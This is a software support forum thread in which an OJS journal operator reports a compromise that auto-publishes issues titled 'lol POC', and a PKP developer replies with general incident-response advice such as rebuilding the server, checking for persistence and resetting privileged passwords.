"lol POC" issue publishes automatically

Software Support
,
1

Hello OJS team,

We are encountering a security issue affecting our journal on OJS 3.3.0.17. Issues titled “lol POC” are being published automatically. Searching this string in Google, I found many other OJS journals with this exact issue title indicating that we are not alone.

We disabled all editor and manager roles except a few trusted ones and reset their passwords to strong keys, but the problem reoccurred. This seems unrelated to specific OJS versions, as we’ve found journals from OJS 3.1.0 up through 3.4.0.7 experiencing the same issue. So, we’re not certain if an update alone will resolve it.

I checked folder permissions and they are not changed. Files folder is not web-accessible.

Could you advise on this problem?

Thank you for your support.

2

Hi @alirezaaa!

I’d say the starting point of this problem is weak journal manager passwords, once someone has access to such account, it becomes pretty easy to do bad things, that’s why I’ve created this discussion: Protection against compromised accounts · pkp/pkp-lib · Discussion #11084 · GitHub.

Once a system is compromised, a hacker may add a lot of alternative ways to keep/restore access to your machine.

You have to disconnect the internet from your server and ensure ALL of those tricks have been removed.

As an example, they can include bad code in the files of your application, include auto-executing code in places like the CRON scheduler/startup scripts (e.g. `~/.bashrc`), create new .php files and leave them in hideous places, etc.

I’d recommend you to:

  • Create a new server and discard the old one (unless your team is skilled enough to identify and remove all threats)
  • Bring only the database + public folder + files_dir
  • Check the best practices at the PKP site (e.g. leaving the files_dir on a public accessible place is going to create problems for you): https://docs.pkp.sfu.ca/admin-guide/en/securing-your-system (this link will be updated soon with more useful information)
  • Look for problems in the database, a smart attacker might attempt to leave code to re-gain access also inside the database (e.g. normally <script> tags).
  • Change the passwords of accounts that have too much privilege: the admin account and the journal managers

Also see: https://pkp.sfu.ca/2025/10/15/keep-your-ojs-installation-secure-with-updates/

Best,
Jonas Raoni

3

thank you @jonasraoni ,

I will check and keep this thread updated.

4

Great! FYI we’ll release new versions soon.

Best,
Jonas Raoni